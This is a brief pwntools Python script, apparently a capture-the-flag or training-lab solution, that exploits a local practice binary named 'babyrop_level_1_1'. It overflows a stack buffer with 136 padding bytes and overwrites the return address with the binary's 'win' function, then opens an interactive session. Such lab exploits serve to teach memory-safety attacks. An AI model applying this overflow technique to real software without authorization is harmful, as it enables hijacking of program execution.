#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./babyrop_level_1_1", checksec=False)
r = process()

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*136
buf += p64(target.sym.win)
s(buf)

r.interactive()